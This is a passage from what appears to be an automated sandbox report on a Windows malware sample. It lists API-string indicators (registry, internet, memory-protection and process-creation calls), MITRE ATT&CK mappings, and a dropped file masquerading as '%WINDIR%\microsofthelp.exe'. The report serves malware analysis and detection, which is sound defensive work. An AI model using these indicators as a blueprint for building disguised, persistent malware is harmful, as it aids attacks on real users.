File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\microsofthelp.exe\" [Source: 00000000-00006008-00000BC1-46164546]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006008)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00000964)\n \"microsofthelp.exe\" called 